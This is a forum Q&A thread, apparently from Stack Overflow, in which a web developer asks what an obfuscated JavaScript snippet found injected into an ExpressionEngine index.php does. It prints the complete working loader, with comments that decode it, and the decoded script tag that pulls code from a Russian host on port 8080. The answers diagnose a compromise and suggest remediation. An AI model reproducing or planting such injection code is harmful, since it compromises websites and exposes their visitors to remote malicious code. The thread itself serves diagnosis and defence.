views: 221
answers: 4

I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previously unknown script. I found this in the index.php file of my ExpressionEngine CMS. Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script...

What is this JavaScript doing? I need to explain the specific dangers to my client.




    this.v=27047;
    this.v+=187;
    ug=["n"];
    OV=29534;
    OV--;
    var y;
    var C="C";
    var T={};

    r=function(){
        b=36068;
        b-=144;
        M=[];

        function f(V,w,U){
            return V.substr(w,U);
            var wH=39640;
        }

        var L=["o"];
        var cj={};
        var qK={N:false};
        // Builds "/google.com/depositfiles.com/speedtest.net.php" from substr() fragments of junk strings.
        var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
        var BT="BT";
        var fV=RegExp;
        var CE={bf:false};
        var UW='';
        this.Ky=11592;
        this.Ky-=237;
        var VU=document;
        var _n=[];

        try {} catch(wP){};

        this.JY=29554;
        this.JY-=245;

        // Strips every character listed in w out of V (regex "[w]" with the "g" flag); the padding
        // characters in the first argument are the ones that get removed.
        function s(V,w){
            l=13628;
            l--;
            var U="["+w+String("]");
            var rk=new fV(U, f("giId",0,1));
            this.NS=18321;this.NS+=195;return V.replace(rk, UW);

            try {} catch(k){};
        };

        this.jM="";
        var CT={};
        var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); // A === "script"

        try {var vv='m'} catch(vv){};

        var Os={};
        var t=null;
        var e=String("bod"+"y");
        var F=155183-147103;
        this.kp='';
        Z={Ug:false};
        y=function(){
            var kl=["mF","Q","cR"];

            try {
                Bf=11271;
                Bf-=179;
                var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); // u === "createElement"
                Fp=VU[u](A); // document.createElement("script")
                var H="";

                try {} catch(WK){};

                this.Ca=19053;
                this.Ca--;
                var O=s('s5rLcI','2A5IhLo'); // O === "src"
                var V=F+fa;
                this.bK="";
                var ya=String("de"+"fe"+f("r3bPZ",0,1));
                var bk=new String();
                pB=9522;
                pB++;
                // F is 8080, so src becomes "http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"
                Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
                Fp[ya]=[1][0]; // defer = 1
                Pe=45847;
                Pe--;
                VU[e].appendChild(Fp); // document.body.appendChild(<script defer src="...">)
                var lg=new Array();
                var aQ={vl:"JC"};
                this.KL="KL";
            } 
            catch(x){
                this.Ja="";
                Th=["pj","zx","kO"];
                var Jr='';
            };

            Tr={qZ:21084};
        };

        this.pL=false;
    };

    be={};
    rkE={hb:"vG"};
    r();
    var bY=new Date();
    window.onload=y; // the injection runs once the page has finished loading
    cU=["Yr","gv"];



+13  A: 

Yes. The site has been compromised.

What you need to do is:

  1. Ensure that everyone who had access to those passwords runs an updated virus scan on computers that they may have logged into the site from.
  2. Ensure that you change all login and admin passwords.
  3. If possible you should likely revert to the codebase as it was prior to you coming across this.
  4. Check the modification time of the script where you found this snippet (if it isn't too late) and look for other files that have been changed around that time. The script is likely randomly generated so grepping for parts of it is unlikely to be conclusive.

If this script was able to find its way in, then so can others. It is not uncommon that web sites are compromised via keylogging trojans on the computers of those who log into them.
See http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

unomi
Thanks for the tips. The only files modified around that time were the index.php file for expression engine and two old index.htm files that were used for a previous design of the site. Apparently, they target index files? I'll pass these suggestions on and hopefully prevent disaster before it's too late!
Julian
My most recent update was <script type="text/javascript"> $(document).ready(function() { document.title = 'New Title'; });</script> Do you think this might have something to do with it?
Julian
No, in order for the script to have been embedded in the manner that it was, the server itself had to have been compromised. Either they found an exploit to gain write access on the server or they were able to get login credentials either through weak passwords, dumb luck or trojans.
unomi
+4  A: 

The script basically adds the following line to your closing body tag:

<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"></script>

So, it's trying to load an external script onto your site. I'm not sure what this script does - but no doubt it's not anything nice.

Additionally, a quick search of "towersky.ru" on google reveals lists of malicious websites containing this site.

I think the guys at towersky.ru might be on a very noble mission here. The included script is named "speedtest.net.php", so maybe they are just trying to inject this script in all web pages around the world and if your site is running slow, they'll just call up and inform you about it.
Anurag
That's fair enough, but have you really got proof of that. Besides, if somebody injected code like that onto my site, clearly without permission, I wouldn't be too happy. Also why was such an effort made to mask what the script does? The use of "google.com" and "depositfiles.com" makes it even more suspicious - it tries to make it appear as if the code is from Google.
+8  A: 

The above code writes some code which activates code on the Russian site (http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php), which adds an invisible DIV containing an iFrame, which I assume contains a picture of a puppy.

Seth
You are correct fine sir. Puppies.
Thqr
+1  A: 

Considering I couldn't even load this page in Windows because my AV stopped me, yes, it's a virus.

TheLQ